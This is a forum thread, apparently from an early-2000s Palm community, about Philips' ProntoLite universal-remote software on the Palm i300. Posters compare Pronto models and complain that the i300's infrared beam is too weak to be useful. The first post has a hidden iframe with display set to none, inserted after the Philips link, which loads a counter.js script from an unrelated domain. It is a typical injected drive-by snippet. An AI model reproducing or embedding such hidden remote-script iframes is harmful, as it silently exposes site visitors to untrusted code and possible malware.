+ Reply to Thread

ProntoLite from Philips

Today Philips announced ProntoLite for all Palm devices. I have downloaded the software on I300. The UI looks good but not customizable. They have a software called neoEdit which can be used to make customizable bitmaps and buttons which is available only for Philips Pronto. Hope they release that software for ProntoLite. It should turn out better than OmniRemote.

Will keep updated of how the software runs.

the site is http://www.pronto.philips.com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    You see - I love - I300 - too

What are the differences?

There is:

ProntoLite Software
    ProntoNEO
    Pronto
    ProntoPro

Now aside from the fact that one is software for PalmOS, one is color and each has a slightly different case what are the differences between them?

The Phillips site is pretty vague on it.

As UC-14-I300-2 stated the software UI is not customizable, although I presume it is on all the others.

Any other differences?

Wink

Most of these "TV Remote" apps are near to useless on the i300. The IR beam is simply too weak to provide any kind of usability. I too tried ProntoLite and have to sit within 3 feet of the TV/VCR to change channel. At that distance I already have a Universal remote that is compatible with all my devices, its called my arm.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    I tried one program and wasn't able to even get it to work within 3 feet.

BUT, if you really want to use your i300 for this option you can alwasy put one of these next to your couch and the other near your stereo

Infra Red Solution

Aaron
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Seems a lot of trouble for a TV remote. However, I actually have one of these gadgets. They're great if you use Dish Network because I have 2 TVs hooked up to the same receiver yet I can watch the one in the bedroom and control it via an IR relay to the receiver. Got mine on ebay for $10. Saves me $5 a month for a second receiver.